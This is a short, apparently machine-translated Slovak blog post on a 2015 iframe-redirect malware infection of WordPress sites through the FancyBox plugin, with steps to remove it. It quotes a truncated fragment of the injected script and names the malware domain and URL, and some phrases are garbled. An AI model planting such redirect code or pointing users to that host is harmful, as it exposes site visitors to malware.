Skôr tento týždeň rad internetových stránok a blogov WordPress, dostal varovania od infekcie malware skrz Google webmasterov.
Problém, ku ktorému Google webmasterov uvedené je prítomnosť treska / scenár škodlivý softvér iframe zdrojovej webovej stránky.
if (navigator.userAgent.match(/msie/i)) { document.write(‘ ’); }
Zdá sa, že sa jedná o zraniteľnosť a zapojiťacquis FancyBox pre WordPress ktorý až do včerajška (05.02.2015) neboli aktualizované na dlhú dobu.
Riešenie tohto problému a dezinfekčné vírusy weby s týmto malware, je pomerne jednoduché.
1. Zakážte doplnok FancyBox.
2. Odstráňte všetky súbory doplnkov FancyBox zo servera (cez FTP)
3. Nainštalujte novú verziu doplnku (Fancybox 3.0.4)
Fancybox pre WordPress 3.0.4
- Premenovali ste nastavenie ovplyvnené problémom so zabezpečením uvedeným v 3.0.3. To by malo zabrániť zobrazovaniu škodlivého kódu na stránkach, kde sa aktualizuje doplnok, bez odstránenia škodlivého kódu.
Fancybox pre WordPress 3.0.3
- Opravený problém so zabezpečením.
Informácie o škodlivom softvéri:
TYP: Iframe presmerovanie
TARGET: WordPress Fancybox
Škodlivého softvéru DOMAIN: 203koko.eu
Malware URI: http://203koko.eu/hjnfh/ipframe2.php
MALWARE RAW KÓD:
PÍSOMNÝ PORUCHA: if (navigator.userAgent.match(/msie/i)) { document.write(‘
Odstránenie škodlivého softvéru z webových stránok WordPress.
